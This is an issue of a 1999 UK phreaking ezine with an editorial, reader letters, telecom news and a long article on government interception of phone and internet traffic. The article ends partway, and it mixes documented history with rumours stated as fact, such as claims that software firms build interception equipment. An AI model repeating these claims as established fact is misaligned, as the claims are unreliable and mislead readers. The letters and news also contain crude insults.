[ D4RKCYDE ]

[ F41TH ISSUE TEN: OCTOBER 1999 ]

+-----------[ hybrid     * http://darkcyde.phunc.com
+-----------[ jasun      * http://hybrid.dtmf.org
+-----------[ zomba      * #darkcyde EFNET
+-----------[ digiphreq  * mailto: hybrid@dtmf.org
+-----------[ downtime   * mailto: hybrid@unixcode.com
+-----------[ force      *
+-----------[ lowtek     *
+-----------[ bodie      *
+-----------[ microwire  *
+-----------[ shadowx    * FIND US ON THE PSTN, B1TCH
+-----------[ sintax     *
+-----------[ shylock    * (C)D4RKCYDE 1997,98,99+
+-----------[ elaich     *
+-----------[ mata       *
|                        *
+----------------------------------------------------------------+

So close it has no boundaries...

A blinking cursor pulses in the electric darkness like a heart coursing
with phosphorous light, burning beneath the derma of black-neon glass.
A PHONE begins to RING, we hear it as though we were making the call.
The cursor continues to throb, relentlessly patient, until...

-+[ editorial and introduction to f41th 10             +-> jasun/hybrid <---+
-+[ letters to f41th & D4RKCYDE                        +-> doods        <---+
-+[ news update /bt adsl                               +-> hybrid       <---+
-+[ government covert telecommunications interception  +-> hybrid       <---+
-+[ DDSN intelligent network                           +-> kelticphr0st <---+
-+[ guide to being arrested in the uk                  +-> bodie        <---+
-+[ meridian security audit, and switch hacking        +-> hybrid       <---+
-+[ sco buffer overflow lameness                       +-> darkraver    <---+
-+[ making chipz                                       +-> hitman       <---+
-+[ systemx internal network operations /structure     +-> hybrid/GBH   <---+
-+[ digital access carrier system DACS                 +-> hybrid       <---+
-+[ outness                                            +-> jasun/hybrid <---+

"when we come to your town, bow down" -the w00

+-+[ editorial ]+---> by jasun <--------------------------+
+-+[ D4RKCYDE ]+---> jasun@phreaker.net <--------------------------+

Here we are with f41th issue 10, edited this time around by jasun. I
suggested to hybrid that I would take the job of editing and compiling
this issue of f41th, so he could have a break from it for a while. So,
here we are again with another issue packed full with info straight from
the heart of some twisted but intelligent people, who are constantly
increasing their knowledge base and kindly passing their knowledge onto
you!

You may have noticed some new sections in this issue, such as News and
Letters. We decided that we would include these to let you all know some
of the feedback we receive, as always some positive and some negative,
everyone has their own opinions. The main thing is that by reading any
issue of Faith and indeed any ezine or article, you are hopefully
learning something new that you did not already know about or expanding
your knowledge further to what you already did know. After all, spreading
knowledge to others is what it's all about... "Share what you know and
learn what you don't" as they say.

Also, just a little note about two upcoming events, Catastrophe '99 &
H2K.

Catastrophe '99 will be held on the 4th December '99 in Manchester,
United Kingdom. It's mainly a party, but from information that is
flowing around, there will be speakers and much more as well. It should
be a good event, considering the success of the previous Manchester
parties. I don't have a url for this event yet, but it should be up
soon. More details as they are announced will be posted in the next
issue of Faith.

H2K, Hope2000 will be held in New York City, from July 14-16th next
year. As this event is a little further away than Manchester, we are
going to be booking travel and accommodation much earlier.
A group of people are going from the UK, if you are considering it,
please contact us as we can probably organise a group discount deal if
we all book together. H2K will be a 24 hour event for the full three
days, as far as speakers and events are concerned, check out the
official conference website, http://www.h2k.net

Enjoy this issue,
jasun.

" Good. Adaption. Improvisation. But your weakness isn't your
  technique. " -Morpheus/Matrix

+-+[ letters to f41th ]+---> <-----------------------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-----------------------------+

Date: Wed, 4 Aug 1999 04:53:07 +0100
From: wheeler14@postmaster.co.uk
To: hybrid@dtmf.org
Subject: URL http://hybrid.dtmf.org/main.html

Hi, i am a relative newcomer to phreaking and i was wondering if you
could just answer a simple question for me.: whilst scanning 0800892xxx
i kept getting an american woman saying, "your call cannot be completed
as dialed please check and try again", pray tell if you will, what the
?$"£< does this bloody mean. i take it that these numbers are something
to do with direct dialling, however i am probably totally wrong. If you
could help me out with this poxy woman as i will scream if i hear her
again. if you can assist i can be contacted through this mail address:
wheeler14@postmaster.co.uk

cheers, MAV

[ yo mav.. "your call cannot be completed as dialed, please check the
  number and try again, 2BM".. annoying huh? Try scanning O8OO 96X-XXX,
  then you'll really see how annoying the stupid telco international DMS
  gateway recording really is. The answer is quite simple, where the 2BM
  recording is, a terminating line once existed. In fact, I'm sure that
  anyone that scans will find this 2BM recording EXTREMELY annoying, in
  fact, going through my scans I have just worked out that I've had to
  listen to that 2BM whore 2,429 times..
  my advice to you: after listening to that damn recording over and over
  and over and over and over again, you'll notice a faint humming noise
  on the line just before the b1tch begins to speak.. just do what I do,
  hang up before you have to listen to it. If you are truly twisted and
  insane (like me) you can go to www.telecom-digest.org and follow the
  link to a website called "the website you have reached" where you can
  listen to 1OO's of telco fault/test recordings in .wav format. For
  those of you who want to hear this damn recording (from the UK) dial
  one of the following numbers, try to resist the urge to smash up your
  telephone... O8OO 961 OO6, O8OO 961 O21. ]

Date: Sun, 25 Jul 1999 04:03:08 +0100
From: xrayman
To: hybrid@dtmf.org
Subject: subscribe

subscribe xrayman@freeuk.com

[ heh ]

Date: Thu, 29 Jul 1999 21:15:16 +0100
From: tommy
To: hybrid@dtmf.org
Cc: tmcoy@globalnet.co.uk
Subject: phreaking

Regarding the uk phreaking scene, I hope you could please e-mail
up-to-date information on obtaining free calls from bt phoneboxes and
cocots and boxing including blue, black etc ( including whether any of
the above are possible now in 99). As I have read a lot of files on the
web most if not all are outdated therefore I was hoping for you to
provide some useful e-mail or irc sources because any new info is not
released to the web to prevent BT who can monitor the web from holing up
any loopholes. Finally, would you kindly obtain some bulletin board
numbers with info on the above and comment on their usefulness.

tommy

[ heh. tip: nothing is outdated or obsolete, people just forget how to
  do shit. Phreaking is not about making free calls. I'm not going to
  mail you codez. BBSs: I used to run one, I got pissed off with ppl
  dialing up in the hope that when they disconnect they will have the
  ability to place free calls.
  BBSs are rare these days, and in most cases are aimed at people that
  take a more serious approach to the 'scene' (no k0d3 kiddies) - try
  altavista.com keywords "help i'm lame" or go to the library and get
  "toll-fraud for dummies" ]

Date: Fri, 23 Jul 1999 18:04:45 +0100
From: Neon Bunny
To: hybrid@dtmf.org
Subject: Faith

I'm currently compiling a collection of files about different types of
systems (e.g. Shiva-LAN-Rover, VAX etc.) and how to identify them. I'd
be grateful if you'd give me permission to distribute your article from
Faith 3 on Shiva-LAN-Rover systems. I'll just snip the article but leave
the header including the author's name & email. While on the subject of
permission, I take it that it's ok to distribute the full collection of
faith (1-7) at my site below, if not then let me know and I'll shift
'em. I also have a handscan of 0800 891XXX which I can send if you want
it for the next faith.

NeonBunny
---
Have you seen the new BunnyBox??? www.bunnybox.f9.co.uk

[ werd. n/p dude.. just one thing: if you decide to distro f41th on ya
  box, be sure to have the latest issue linked to the following
  address.. ] f41thx

This message contains non-ASCII text, which can only be displayed
properly if you are running X11. What follows may be partially
unreadable, but the English (ASCII) parts should still be readable.

please help me i am being bothered by this lad but i can't get his ip
address to bother him back could you tell me how?
shaggy@corl.fsnet.co.uk

[ ? ]

i have been reading faith zine for some time, and i was wondering if
subscription is possible where some auto-bot would notify us, devoted
users, of every new issue. thank you for your time.
--
Be well, Net Runner

[ just download it ]

just a quick one,,,,,don't take away the ascii logs,, the humour in them
and the similar funny parts of f41th are the things that set you apart
from the "other mags". Like for example the fun you had in #jesus.
that reminded me of when i went in there,, took the piss out of the ops
for not being christian enough...(i was arguing that jesus wouldn't ban
ppl from the chat room)...... the logs and other stuff make the readers
think that the zine's being written by people we understand and
emphasize with. it's nothing massive but it's one step away from the mag
we can read and laugh at the same time. cheers anyway, mail us back if
you want to discuss anyfing,,, or catch me on efnet - Degener8

[ yeah/ish ]

Hi, Just a quick note to say what a great site you have got and to ask a
quick question. If I wanted to obtain Tools and Equipment for research
purposes to do with hacking/phreaking where could I get hold of them?

Cheers THE FAT MAN

[ the donut store ]

This message contains non-ASCII text, which can only be displayed
properly if you are running X11. What follows may be partially
unreadable, but the English (ASCII) parts should still be readable.

APT Issue 5 is now out. Download it from: http://surf.to/krash
For subscription information, email me with the subject CMD:HELP

[ NO#@~%$!! - your magazine and its SWAT team crew can suck my left nut.
  All the stuff on your site sucks, i don't wanna know how to blow shit
  up, I THINK I KNOW HOW TO FUCKING RED B4WX.... GO AWAY, AND SEEK HELP ]

" Your spoon does not bend because it is just that, a spoon. Mine bends
  because there is no spoon, just my mind. " -SpoonBoy/Matrix

+-+[ f41th Newz ]+---> by hybrid <-----------------------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-----------------------------+

/*
 * UK mobile telecom companies asked to
 * cut down on cellular masts
 */

UK cellphone companies such as Orange, one2one, cellnet etc have been
told not to install too many radio masts. The fact is, we need more to
improve reception, but a lot of people seem to think they ruin the
scenery of England. WTF?..
This is no shit, now cellular giants such as cellnet are developing
antennas that are in the shape of trees and brown in colour so they
"blend in" LOL. In one area of the UK, an antenna was erected near to an
old persons home, soon after, residents of the old peoples home
complained that the CellNet radio mast was interfering with their
hearing-aid equipment! And of course the mast was taken down and moved,
so a whole bunch of people lost cellular coverage simply because of some
old hag's hearing aid.. shiet@£$! what is this country! -- i want out!,
where's my ticket to NY?

/*
 * BT's new generation of switches
 * for the UK communications backbone.
 */

BT have announced a framework agreement with Ericsson for the
development and supply of the next generation, high performance switches
designed to meet the needs of the rapid data traffic growth in the UK.
The deal is worth potentially up to £270 million and will secure BT's
network capacity into the next millennium.

The new switches from Ericsson will enable BT to expand its backbone
network capacity rapidly to meet the anticipated growth in Internet,
high speed data and video services. The Ericsson switches will integrate
seamlessly into BT's existing network. The switches will be deployed
over the next four years using state of the art technology, providing
initial switching capacities of up to 160 Gigabits per second and future
growth into Terabits.

The first switch was scheduled to go live in June, 1999. All switches
will be directly connected to BT's optical fibre SDH network, which
currently has more than 600 nodes and is doubling in size every year.
Installation work to replace existing trunk switches with the new high
performance switches started during 1999 and will continue over the next
four years.
This investment is over and above the £800 million expenditure BT
announced last May, which is being used to extend significantly the
reach of BT's core Synchronous Digital Hierarchy (SDH) optical fibre
transmission network and exploit Dense Wave Division Multiplexing (DWDM)
technology.

/*
 * Oftel look into ADSL
 * (about fucking time)
 */

There are many things that I dislike about BT and UK regulators such as
Oftel, one of them being they all brag about "High-Tech" technologies on
the UK PSTN such as ISDN, or how grateful we should be that we _only_
have to pay 1p a minute for local calls (net access). Like, get with the
program, heh. BT need to sort it out.. ISDN blows, but they seem to
think it's the forefront of technology.. Oh yeah, not to mention the
fact that if you have a standard line, and ask BT for a second line for
net access, guess what? - they won't install a second line for you, they
will stick a device such as the DACS (Digital Access Carrier System) on
your line which will split it into 2 separate carriers.. W0W, thanks BT,
now I can join the "BT SuperHighway" at lightning speeds of a maximum of
28800bps, and courtesy of BT "SuperHighway" I get bonus CRC checksum
errors!

IF YOU ARE ONE OF THE MILLIONS OF UK BT SUBSCRIBERS THAT ASKED BT TO
INSTALL A SECOND LINE FOR YOU, CHANCES ARE YOU HAVE A DACS II, OR WB900
UNIT MULTIPLEXING YOUR LINE.. TRY DOING A SALT TEST FROM THE LINE..
17070.. IT WON'T WORK 'CAUSE THAT LINE IS NON-EXISTENT. PHONE BT _NOW_
TELL THEM YOU DON'T WANT THEIR PIECE OF SHIT "HIGH TECH" DACS UNIT ON
YOUR LINE.. GET WHAT YOU PAID FOR (A REAL LINE). DACS/WB900= 28.8, TELL
THEM WHERE TO GO.

note: I know someone that had a BT DACS line splitter fitted who asked
BT for a SECOND line.. we phoned BT and asked why this was..

" dood, why can I only get 28.8 on my line? "
" you need to update your modem "
" i have a 56k modem, it doesn't like your DACS superhighway "

blah blah blah.. then they said...
(get a load of this shit)

" The reason the DACS II system is deployed is because we have concerns
  about the environment, if everyone had 2 lines it would be wires
  everywhere.... "

AND..?? BT seem to think that including E.T. in their lame-ass adverts
will impress customers with their services.. The money they spent on the
copyright rights to show E.T. was probably enough to update an exchange,
but that's BT for you, they'll be selling baked-bean cans with string
attached to them soon.. THEY DON'T CARE ABOUT UK TELECOMS.. THEY JUST
WANT YOUR 1P p/m

Anyways, I'm getting worked up here, so I'm going to continue with the
newz.. The UK telecoms regulator Oftel, has proposed that ADSL should be
present in rural and "disadvantaged" areas of the UK, therefore BT have
(proposed) that 400 exchanges will be updated to carry the "new"
technology by March 2000.. Areas that will benefit from ADSL (Asymmetric
Digital Subscriber Line) are as follows:

    London     *
    Cardiff    *
    Belfast    *
    Coventry   *
    Manchester *
    Newcastle  *
    Leeds      *
    Edinburgh  *
    Glasgow    *

Heh, BT need to sort it out.. considering ppl in New York are able to
get 7 Mbit/sec ADSL connections (equivalent to 1,500 BT "superhighway"
connections)

sn1per$/sbin/ping :(

For more information regarding Oftel and BT go to: www.oftel.gov.uk or
www.bt.com

/*
 * PLE (phone loosers of england)
 * apologise to D4RKCYDE...
 */

[ taken from http://www.phoneloosers.com ]
[ phoneloosers of england ]

03/09/1999 PLE Apologises to D4rkcyde

"We want to apologise to d4rkcyde for including some of their scanned
numbers in the PLE Phone directory without getting their permission.
OKaos sent you an E-mail but when you never replied he stupidly took
this as a yes, and this was obviously wrong. OKaos has now been relieved
of his duties of Editor - we felt this was the best thing to do.
If we could find any of your important members on IRC or anywhere else
for that matter we would apologise in person, but as we can't even find
your site anymore this will have to do. Sorry Guys, hope you can
understand / forgive..."

irc: #darkcyde efnet
url: http://darkcyde.phunc.com

" Fuckin' idiots don't know shit. " -Neo/Matrix

+-+[ Government telecommunications interception ]+---> by hybrid <-----------+
+-+[ D4RKCYDE ]+---------------------------> hybrid@dtmf.org <-----+

BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ]

Covert Government/Military Interception of International
Telecommunications. (Pure Paranoia)
Written for f41th magazine, October 1999 by hybrid

Part I

  1. Introduction
  2. Communications Intelligence (COMINT) and the NSA
     a) UKUSA Alliance
  3. The Covert Interception of International Telecommunications
     a) International Leased Carrier (ILC) Interception
     b) High Frequency Radio Interception
     c) Interception of Microwave Radio Relays
     d) Interception of Submerged Telecommunications Cables
     e) Covert Communications Satellites
     f) Communications Techniques
        o Operation SHAMROCK
        o More High Frequency Radio Interception
        o The Space interception of InterCity Networks
        o SIGINT Satellites

Part II

  5. Introduction to part II
     a) Submarine Cable Interception
     b) Covert Interception of the Internet Protocol
  6. Covert Collection of High Capacity Signals
     a) New Satellite Networks/Systems
     b) ILC Processing Techniques
  7. Hardcore Telecommunications Covert Interception
     a) Broadband (High Capacity Multi-Channel) Communications
     b) Covert Telecommunications Interception Equipment
        o Extraction of Wideband Signals and Data Analysis
        o Covert Data Processing, Fax Transmission Analysis
        o Multi Protocol Traffic Analysis Techniques
     c) Speech Recognition and Voice Interception
        o Advanced Speech Recognition, Real CallerID
  8. Closing, Summarisation
     a) My PGP Key ;>

Part I
------

1. Introduction
===============

Are you paranoid? You damn well should be.
I've recently come across some very disturbing facts about how
international covert government organisations intercept, filter and
collate data from international communication protocols and networks.
This article is only the very tip of the iceberg, there is no way I
could possibly cover the wide spectrum of "big brother" activity that
shadows over the communication networks that are deployed at present, to
do so would require a whole database. The fact is big brother IS
watching you, not just you, but also other governments and economic
bodies. In this file I will discuss the different, very covert
techniques that are deployed by certain agencies and alliances to
effectively intercept any type of public, or supposedly "classified"
data/voice transmission. After reading this article, you'll probably
think twice before placing a phone call.

2. Communications Intelligence (COMINT) and the NSA
===================================================

COMINT is an abbreviation for Communications Intelligence. The covert
interception of telecommunications has existed for a very long time, and
began around about the same time that public telecommunications became
widely available. It is evident that every single "technologically
advanced" country in the world participates in the covert interception
of foreign communication mediums. I would define it as an ongoing game
of counter-intelligence, where superpower nations are spying on each
other, spying on each other. The scary thing is, it's not just
diplomatic communications that are being intercepted, in most cases, an
entire nation's telecommunications infrastructure is being monitored,
both from remote locations, and from our own intelligence organisations
spying on us. The NSA openly admit to such activity, although would
probably deny any "local" communication interception techniques.
COMINT is in the same intelligence family as SIGINT (Signals
Intelligence) which involves the interception of signal emissions from
sources such as radar emissions.

Obvious COMINT communications targets: (interception)

    o military communications
    o diplomatic communications
    o economic intelligence
    o scientific intelligence
    o drug trafficking
    o organised crime
    o severe fraud
    o terrorism

Side note: hacking, phreaking, participation in "underground" hacking
collectives would be defined as organised crime, and in some cases
defined as terrorism. (they have a real nice way of classifying things)

a) UKUSA Alliance

USSS (United States SIGINT System) is made up of the NSA (National
Security Agency), collective sub-units known as the "CSS" (Central
Security Service), as well as some parts of the CIA and surrounding
organisations/bodies. After the second world war in 1947, the US made an
agreement with the UK to commence international intelligence operations
world wide. Other English speaking countries were allied into the UKUSA
agreement as second parties, they include Canada, New Zealand and
Australia. The UKUSA intelligence alliance was not exposed until earlier
this year (March 1999), when the Australian government confirmed its
deployment of DSD (Defense Signals Directorate) and admitted to being
part of the UKUSA collaboration of intelligence gathering.

3. The Covert Interception of International Telecommunications
==============================================================

a) International Leased Carrier (ILC) Interception

A knowledgeable phreak will know how easy it is to intercept supposedly
private telecommunications, we all know that the US PSTN (Public
Switched Telephone Network) is made up of RBOCs (Regional Bell Operating
Companies) which all deploy multiple levels of switching architecture
and signal protocols.
For over 80 years, incoming and outgoing international
telecommunications traffic passing through International eXchange
Boundaries has been intercepted and filtered for an initiative known as
"National Security". All US RBOCs have strong links with COMINT, and
IXCs (Inter eXchange Carriers) such as AT&T have ties with government
communication collectives. COMINT organisations refer to such carrier
providers as ILCs (International Leased Carriers), and would obviously
have to work closely with such providers where telecommunications
interception is involved.

b) High Frequency Radio Interception

The majority of the world's international contemporary
telecommunications networks are made up of optical transmission
protocols, but before this, most international telecommunications were
conducted via HF transmission (High Frequency), which was used both for
public communication as well as diplomatic and military communications.

------------x-----------------------x-----------------------x
          /   \                   /   \                   /
        /       \               /       \               /
      /           \           /           \           /
    /               \       /               \       /
  /                   \   /                   \   /
x-----------------------x-----------------------x-------------
x)                      y)                      z)

In the above diagram, (x) is transmitting to (z). The HF signal is
bouncing from the Earth's ionosphere back down to (y), then back to the
ionosphere, down to (z). Incidentally, in this scenario, (y) is the dude
in the middle, intercepting the transmission before it reaches (z).
Here, the interception of transmission was relatively straightforward
because HF radio transmissions are bounced from the Earth's ionosphere
and back down to the Earth's surface, forming a zigzag type path around
the world. This provided ample space for a primitive "man in the middle"
interception of the reception of such data.

c) Interception of Microwave Radio Relays

Microwave radio was deployed in the 1950s as a means to provide
higher-capacity inter-city communications, implementing telephony and
television.
Microwave parabolic dishes are placed around 50km apart from each other,
as a means of communication relay stations. Later I will discuss how
such a communications medium can be intercepted.

d) Interception of Submerged Telecommunications Cables

Early international telecommunications were very primitive compared to
what we have today, and only allowed a maximum capacity of 100 telephone
calls on simultaneous channels. Today Optical Fibre transmission systems
are deployed as part of the world wide PSTN, and can handle 5Gbps of
simultaneous data transmission, which is 60,000 phone calls occurring
simultaneously, which is why we no longer require operators to place
international calls.

e) Covert Communications Satellites

Because of the nature of microwave emissions, they do not reflect off of
the Earth's ionosphere like HF radio transmissions. Instead, they
penetrate the Earth's atmosphere and are emitted off into space. This is
where the covert satellites come into the picture.

                        x                           satellite
                      /   \
                    /       \
                  /           \
                /               \
              /                   \
------------x-----------------------x------------   ionosphere
          /                           \
        /                               \
      /                                   \
    /                                       \
  /                                           \
x-----------------------------------------------x-  earth's surface
x)                                              z)

The most popular satellite setups are those that operate in
geo-stationary orbit, or (the Clarke belt) and are provided for
broadcasting purposes. The largest collection of communications
satellites in orbit are the COMSATs and are operated by the
International Telecommunications Satellite organisation (Intelsat). The
latest addition of telecommunications satellites can handle over 90
thousand simultaneous calls each.

f) Communications Techniques

Before 1970, the majority of communications systems were of analogue
nature and utilised continuous wave technique. Now, all major
communication systems are digitally derived, and provide a much higher
capacity.
The highest capacity systems are for internet backbone usage
(STM-1/OC-3) and can operate at data rates of 155Mbs (Million bits per
second) which is the equivalent to the transmission of 1 thousand books
a minute. I'll cover these transmission techniques in more detail in the
technical part of this file. Where this type of digital communication is
deployed COMINT organisations cannot intercept data unless they have
direct access to the communications channels that the data travels over.
The data is usually encrypted, but no big deal for such a collective as
COMINT, so they obtain access to these communications channels with (or
without) the prior co-operation of the carrier provider.

o Operation SHAMROCK

The NSA are well known for systematically gathering telecommunications
traffic from offices of major cable companies. The interception of cable
traffic in the US is referred to as "operation shamrock", and until
recently remained un-exposed for over 30 years. In 1975 an NSA director
admitted to the US house of representatives that such operations do
exist within the NSA.

"..The NSA systematically intercepts international communications, both
voice and cable"

"messages to and from American citizens have been picked up in the
course of gathering foreign intelligence".

"...was obtained incidentally in the course of NSA's interception of
aural and non-aural (e.g., telex) international communications and the
receipt of GCHQ-acquired telex and ILC (International Leased Carrier)
cable traffic (SHAMROCK)..."

o More High Frequency Radio Interception

HF radio transmissions are easy to intercept, in the sense that all you
need is the appropriate equipment, and an area which is located in a
quiet radio location. Up until 1980 the NSA and the UK's GCHQ used HF
radio interception equipment to capture European HF communication on a
base in Scotland.
The equipment used then was an antenna 400 meters in diameter, and was
designed to be omnidirectional (capture emissions from every possible
angle). There is a secret base in the UK at Chicksands which is operated
by the NSA and DODJOCC. Its purpose is to collect and intercept Soviet
and Warsaw Pact air force communications, and also to collect ILC and
"NDC" (Non-US Diplomatic Communications).

o The Space interception of InterCity Networks

Long distance microwave involves the implementation of many transmitters
and relay stations. When a microwave transmission takes place, the
receiving end only absorbs a small fraction of the original signal
strength, the parts of the microwave transmission that the receiver
didn't pick up pass through the Earth's atmosphere into space as
discussed before. Therefore, contemporary microwave communications are
intercepted by covert intelligence gathering satellites that are mounted
80 degrees longitude of the horizon. At present, there are many secret
satellites operating both in geo-synchronous orbit as well as satellites
following mission paths that gather as much microwave communication
traffic as possible and relay back to secret installations on Earth.

o SIGINT Satellites

The CIA first launched the SIGINT satellite program back in 1967 which
lasted until 1985. The satellites were operated from remote ground
installations in Australia and implemented parabolic antenna which were
able to unfold once in orbit, initially the satellites intercepted
transmissions from the VHF radio band. To this date, similar satellites
are in use, codenamed MAGNUM and ORION, they are designed to intercept
and filter multiple communications methods on Earth such as VHF radio,
cellular and mobile phones, pagers, and also mobile data links, packet
radio etc. The idea of this is fairly daunting, basically if you page
your girlfriend, chances are the pager radio signal will be intercepted
but probably filtered as it would be of no relevance to "national
security".
This is not some paranoia/conspiracy theory, this is fact. The IOSA
system (Integrated Overhead SIGINT Architecture) is very much at large
to this date, and is controlled from ground level at the following
locations across the world:

    o Buckley Field, Denver, Colorado
    o Pine Gap, Australia
    o Menwith Hill, England
    o Bad Aibling, Germany

Each "secret" installation is rumoured to cost a lot of money to run,
something in the line of 1 billion dollars each. In 1998, the US
National Reconnaissance Office (NRO) said it would combine the three
separate classes of Sigint satellites into an Integrated Overhead Sigint
Architecture (IOSA) in order to " improve Sigint performance and avoid
costs by consolidating systems, utilising ... new satellite and data
processing technologies". Because of this new spy satellite setup in
earth orbit, the US can now use its newly acquired technology to
intercept ANY mobile communications source, including city to city
traffic across the globe. The main intention of these satellites is
however to concentrate on foreign military and diplomatic "hotspots".
GCHQ in the UK are now part of project MERCURY and use the system for
similar purposes.

Part II
-------

Introduction to part II
=======================

Summarising part I, we now know about covert satellites, the bases, and
the general layout of microwave interception. Now I'm going to discuss
the slightly more scary stuff, the parts that affect me and you, ranging
from the interception of phone traffic, to the mass intelligence
gathering on the internet. Hopefully you've read all of part I so you
can understand the following better, if you just paged you suck.

Submarine cable interception

Submarine cables are widely used in international telecommunications,
and are therefore a target for anyone wishing to intercept international
telecommunications traffic. During the 1970s, a secret submerged cable
tapping operation named "IVY BELLS" was executed by US submarines near
the USSR.
The mass line tap operation of USSR communication ended in 1992 when the geographic locations of the submerged line taps were sold to the KGB by a former NSA employee. To this date, the US still plant submerged line taps on various communications links, rumoured to be in the Middle East, the Med, eastern Asia, and South America. The United States is the only naval power known to have deployed deep-sea technology for this purpose. Where fibre optic cables are concerned, it is impossible to simply place a radio sensitive inductive tap on them, because obviously fibre optics don't leak radio frequency signals. However, the NSA spend a lot of time and money on research into optical fibre tapping, and are rumoured to be successful in such research using optoelectronic "repeaters" which boost signal levels over long distances.

Covert Interception of the Internet Protocol
============================================

The NSA and GCHQ both operate a private network which is considered to be just as large as the public net. This private network is known as project EMBROIDERY and is said to span the globe via a massive WAN. It is this network which is said to serve such purposes as project ECHELON and other intelligence projects. The whole system is based on the IP protocol. The majority of internet traffic originates in, or is passed through, the US and its major routers. Since early 1990, the COMINT project have developed systems which intercept and filter all packet, or digital, data travelling via the US net backbones. The targets of such interceptions are communications between Europe, Asia, Oceania, Africa and South America. When a packet is sent, depending on the time stamping of the origin and destination, it is likely it will pass through a major network exchange somewhere in the US. For example, routers in USwest are most idle when European packet traffic is at its peak because of the time zone differences.
Because of this, high capacity network traffic will pass through the routers which are situated in USwest, which subsequently the NSA have access to (for COMINT purposes); it is then that the NSA can intercept data travelling to and from European countries. Where COMINT and the internet are concerned, COMINT interception takes advantage of the way in which internet packets are routed, in the sense that datagrams contain the numerical routing instructions which are used by COMINT to filter irrelevant traffic. Any packet with a military or diplomatic datagram origin is likely to be intercepted at a major US network backbone to be filtered or analysed. alt.Usenet discussion groups are well known to be intercepted and analysed by government agencies; such Usenet traffic accumulates about 15 gigs of transmitted data per day. Intelligence agencies have open access to all Usenet discussion groups, and most store the information in massive databases. For example, in the UK, the DERA (Defense Evaluation and Research Agency) maintain a 1 terabyte database which contains 90 days worth of all Usenet messages. DERA also operate web-robots which scan the net for certain keywords and then mirror entire sites on this database. Subsequently my own site has been visited by DERA, and since then is visited 2 times per month by:

xxx.dera.gov.uk - - [18/Jul/1999:16:10:05 -0500] "GET /files/hybrid-files/x

Recently an NSA employee informed the public that certain major backbone net exchanges are being monitored for ALL data travelling through them in the US.
The NSA either have direct access to them, or have mass sniffer programs running to collect as much data as possible travelling through the following major internet exchanges in the US:

(NSA Internet Comint access at IXP sites)

Internet site   Location                   Operator         Designation
------------------------------------------------------------------------------
FIX East        College Park, Maryland     US government    Federal Information Exchange
FIX West        Mountain View, California  US government    Federal Information Exchange
MAE East        Washington, DC             MCI              Metropolitan Area Ethernet
New York NAP    Pennsauken, New Jersey     Sprintlink       Network Access Point
SWAB            Washington, DC             PSInet/BellAtl   SMDS Washington Area Bypass
Chicago NAP     Chicago, Illinois          Ameritech        Network Access Point
SanFran NAP     SanFrancisco, California   Pacific Bell     Network Access Point
MAE West        San Jose, California       MCI              Metropolitan Area Ethernet
CIX             Santa Clara California     CIX              Commercial Internet Exchange
------------------------------------------------------------------------------

It is rumoured, and almost certainly true, that a leading US telecommunications and internet provider company is contracted with the NSA to develop specialised mass data gathering software for installation on such internet exchanges; other software manufacturers such as Microsoft and Netscape etc. are said to aid in the production of specialised
network traffic interception equipment. (see enclosed .jpg files for screenshots)

6. Covert Collection of High Capacity Signals
=============================================

Where very sensitive data is concerned, diplomatic agencies are usually very wise to the fact that someone out there may be interested in intercepting it. Therefore, when the more obvious interception methods/procedures are impractical, COMINT agencies develop special devices that can be installed on the target premises or base. The NSA manufactures specialised equipment for use in covert activities; one such device is called the "ORATORY" -a computer that fits into a briefcase, which is programmed to behave on dictionary selection for use in sigint data interception.

a) New Satellite Networks/Systems

A popular means of communication for government employees are private dedicated mobile communications. There are satellites orbiting very fast around the Earth, each in its own orbit pattern, which provide global coverage for diplomatic usage. These systems are sometimes called Satellite Personal Communications Systems or SPCS. At present, there is a satellite network called the IRIDIUM network, which was launched in 1998. The IRIDIUM satellite network implements 66 satellites, each relaying mobile data back to the ground. IRIDIUM is considered to be fairly secure, in the sense that anyone trying to intercept network data would have great trouble, as the satellites are fast moving and only beam information back down to Earth in a concentrated beam.

b) ILC Processing Techniques

Covert agencies employ a vast array of multi-protocol data interception systems and devices. Such devices are capable of intercepting selectable, or randomly chosen, communications channels, implementing a new concept called "topic analysis". It has been a rumour for a long time that covert agencies use equipment that is capable of reacting to certain keywords when intercepting voice or modem traffic.
It is rumoured that if you say something like "kill_the_president" over the telephone, you'll have a gathering of feds outside your front door. This rumour however, is probably not true when referring to a residential line, unless a line has been "tapped" beforehand. However, such systems DO exist, and all operate on topic analysis techniques. For example: such systems are based on dictionary computers with built in (pre-programmed) key words. These systems are designed to be placed in the paths of communications channels, such as standard voice traffic, or modem links. The properties of such systems are as follows:

o A topic analysis COMINT system would be "attracted" to certain levels of communications traffic, such as international calls to and from "hotspot" areas, or above normal calling frequency (scanning, or suspicious overusage of a given communications protocol).
o ability to "pick-up" on certain keywords, or signatures.
o voicetracking capabilities, ie: voice recognition, frequency analysis of voice patterns.

It is therefore presumable that such monitoring devices may be attracted to any given voice/data channel if such patterns are emitted, ie: heavy call usage. However, such interception techniques can be impaired to a certain extent when the channels being monitored implement voice or data encryption, hence the international export laws on cryptographic engines and algorithms. Comint interception devices are individually designed to intercept different arrays of communications protocols; for example, some devices are designed solely to intercept internet traffic (packet analysis, headers etc), others are designed to intercept pager signals and voice traffic (topic analysis). Any type of publicly known communications medium is subject to interception by a foreign source (if there is motive).

7.
Hardcore Telecommunications Covert Interception
==================================================

a) Broadband (High Capacity Multi-Channel) Communications

taken from a 9x file by me (FDM): http://www.ninex.com/9x/rawtext/9X_TEL.TXT

------------------------------------------------------------------------begin-
